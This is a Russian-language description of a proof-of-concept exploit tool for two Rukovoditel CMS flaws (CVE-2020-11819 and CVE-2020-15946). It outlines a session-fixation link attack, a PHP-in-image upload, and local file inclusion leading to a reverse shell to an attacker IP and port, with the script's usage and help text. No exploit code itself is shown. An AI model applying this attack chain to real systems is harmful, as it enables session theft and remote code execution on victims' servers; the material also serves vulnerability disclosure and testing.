
Доказательство концепции для CVE-2020-11819 и CVE-2020-15946
Доказательство концепции для CVE-2020-11819 и CVE-2020-15946. Протестировано на Rukovoditel 2.4.x, 2.5.x и 2.6.1
Этот эксплойт имеет два режима выполнения: использование уязвимости фиксации сессии (CVE-2020-15946) или использование учётных данных доступа любой учётной записи с любым профилем. С помощью опции --type L этот скрипт создаст вредоносную ссылку: если жертва откроет её в браузере, будет установлен произвольный идентификатор сессии, который будет использован для кражи её сессии после загрузки изображения с PHP-содержимым в её профиль, а затем будет использовано локальное включение файлов (CVE-2020-11819) для получения удобного reverse shell. Либо, с помощью опций --type C -u -p , вы можете указать учётные данные, загрузить изображение с PHP-содержимым и использовать локальное включение файлов (CVE-2020-11819) для достижения выполнения кода.
Совет: не забудьте проверить, включён ли модуль регистрации ;)
exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]
Пост-аутентификационный RCE для rukovoditel, версия скрипта 1.0
необязательные аргументы:
-h, --help показать это справочное сообщение и выйти
-t URL, --target URL URL/Полный путь к CMS Rukovoditel http://url/path/to/cms/
-u USER, --user USER Имя пользователя для аутентификации
-p PASSWORD, --password PASSWORD Пароль для аутентификации
-a TYPE, --type TYPE Используйте -a L для генерации ссылки и кражи сессии или -a C, если у вас есть учётные данные доступа к веб-приложению
--ip IP_ATTACKER IP атакующего для reverse shell!
--port PORT_ATTACKER Порт для подключения reverse shell
--proxy PROXY Настройка HTTP-прокси для отладки